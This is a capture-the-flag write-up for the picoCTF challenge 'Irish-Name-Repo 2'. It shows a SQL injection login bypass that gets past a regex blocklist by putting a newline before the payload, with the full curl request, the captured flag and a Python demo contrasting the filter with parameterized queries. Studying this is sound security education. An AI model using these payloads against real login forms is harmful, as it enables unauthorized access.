Categories: web

Irish-Name-Repo 2 - 350 points


There is a website running at (link). Someone has bypassed the login before, and now it’s being strengthened. Try to see if you can still log in!




Okay, so we already know that the vulnerability is SQL injection from the last challenge. We try to inject simple payloads like ' OR 1=1 -- but there seems to be some kind of filter in place.

After messing around I realized that the filter behaves like regular expressions and realized that they might terminate at a newline.

So, I made a request with a newline before my payload:

curl '' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6  Sicherheits-Erg\xe4nzungsupdate) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer:' -H 'Content-Type: application/x-www-form-urlencoded' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Cookie: jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiJz5cIj48aDE-aGk8L2gxPiJ9.5TyqQ5kcsGZB2MeWCkp6wRPvl3TfqQ_Pk83Dcv2kNbA' -H 'Upgrade-Insecure-Requests: 1' --data 'username=%27%0A or 1=1--&password=&debug=0'

I got this response:

<h1>Logged in!</h1><p>Your flag is: picoCTF{m0R3_SQL_plz_c9c1c726}</p>

Nice, an easy start to this CTF.
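Why a newline gets past this kind of filter, as an added example that is not part of the original write-up or the challenge's code. The blocklist regex, the users table and the function names are assumptions made for illustration; the real filter was never shown. It puts the filtered, concatenated query next to a parameterized one, which is the actual fix.

```python
import re
import sqlite3

# Hypothetical blocklist filter (assumption, not the challenge's real code).
# re.match anchors at the start and "." does not match "\n" by default,
# so only the first line of the input is ever inspected.
BLOCKLIST = re.compile(r".*\b(or|and|union|select)\b", re.IGNORECASE)


def filter_allows(value: str) -> bool:
    return BLOCKLIST.match(value) is None


def make_db() -> sqlite3.Connection:
    # Constructed sample data for the demonstration.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db


DB = make_db()


def login_filtered(username: str, password: str) -> bool:
    """'Before': blocklist filter in front of a concatenated query."""
    if not (filter_allows(username) and filter_allows(password)):
        return False
    query = ("SELECT name FROM users WHERE name='%s' AND password='%s'"
             % (username, password))
    return DB.execute(query).fetchone() is not None


def login_parameterized(username: str, password: str) -> bool:
    """'After': values are bound as data, so no keyword filter is needed."""
    query = "SELECT name FROM users WHERE name=? AND password=?"
    return DB.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    plain = "' OR 1=1 --"      # payload from the write-up, caught by the filter
    newline = "'\n or 1=1--"   # same payload after a newline (%27%0A ...)
    for name in (plain, newline):
        print(repr(name), filter_allows(name),
              login_filtered(name, ""), login_parameterized(name, ""))
```

Compiling the pattern with re.DOTALL would close this particular gap, but the filter would still be a blocklist; binding the values as parameters removes the injection regardless of what characters arrive.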